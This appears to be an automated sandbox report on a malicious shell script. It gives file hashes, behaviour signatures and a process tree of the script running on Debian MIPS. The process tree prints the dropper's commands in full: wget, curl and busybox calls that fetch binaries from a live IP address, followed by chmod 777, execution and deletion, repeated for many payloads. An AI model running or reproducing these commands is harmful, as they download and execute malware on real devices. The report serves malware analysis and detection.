Analysis
-
max time kernel
64s -
max time network
66s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-11-2024 03:33
Static task
static1
Behavioral task
behavioral1
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
-
Size
10KB
-
MD5
01b56d1b9cc005de6042881dafcef1bf
-
SHA1
37f98670c045d4e2627287b76bed156bae8d9a10
-
SHA256
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8
-
SHA512
617294ee58e825e6af28f02ab893ca33b04be9f8b1154d6f335a5b8085e2706046661ab704c92730764d6e1b132af69593e9d054e4fe2a31c9aa326ab52f6ac2
-
SSDEEP
192:qfHqRU7VKbQJxAcqZdGhBu4pHZdGhBNTfHqTY9JxAcp:pS7VKblKLs9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 746 chmod 772 chmod 881 chmod 893 chmod 899 chmod 820 chmod 869 chmod 917 chmod 923 chmod 809 chmod 734 chmod 935 chmod 941 chmod 950 chmod 974 chmod 802 chmod 845 chmod 887 chmod 905 chmod 956 chmod 962 chmod 929 chmod 875 chmod 911 chmod 968 chmod 740 chmod 857 chmod 863 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 735 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR 741 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX 747 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 773 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO 803 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx 810 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm 821 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd 847 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf 858 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR 864 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK 870 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk 876 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm 882 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt 888 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf 894 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR 900 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK 906 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk 912 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm 918 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt 924 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO 930 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 936 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR 942 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX 951 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 957 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx 963 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm 969 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd 975 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd curl File opened for modification /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 curl File opened for modification /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf curl File opened for modification /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf curl File opened for modification /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt curl File opened for modification /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR curl File opened for modification /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm curl File opened for modification /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd curl File opened for modification /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR curl File opened for modification /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 curl File opened for modification /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx curl File opened for modification /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm curl File opened for modification /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX curl File opened for modification /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO curl File opened for modification /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK curl File opened for modification /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk curl File opened for modification /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk curl File opened for modification /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm curl File opened for modification /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX curl File opened for modification /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 curl File opened for modification /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm curl File opened for modification /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR curl File opened for modification /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 curl File opened for modification /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt curl File opened for modification /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR curl File opened for modification /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx curl File opened for modification /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK curl File opened for modification /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO curl
Processes
-
/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:707
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:732
-
-
/bin/chmodchmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:739
-
-
/bin/chmodchmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:745
-
-
/bin/chmodchmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:766
-
-
/bin/chmodchmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:776
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:797
-
-
/bin/chmodchmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:808
-
-
/bin/chmodchmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:814
-
-
/bin/chmodchmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:840
-
-
/bin/chmodchmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:851
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:856
-
-
/bin/chmodchmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:862
-
-
/bin/chmodchmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:868
-
-
/bin/chmodchmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:874
-
-
/bin/chmodchmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:880
-
-
/bin/chmodchmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:886
-
-
/bin/chmodchmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:892
-
-
/bin/chmodchmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:898
-
-
/bin/chmodchmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:904
-
-
/bin/chmodchmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:910
-
-
/bin/chmodchmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:916
-
-
/bin/chmodchmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:922
-
-
/bin/chmodchmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:928
-
-
/bin/chmodchmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:931
-
-
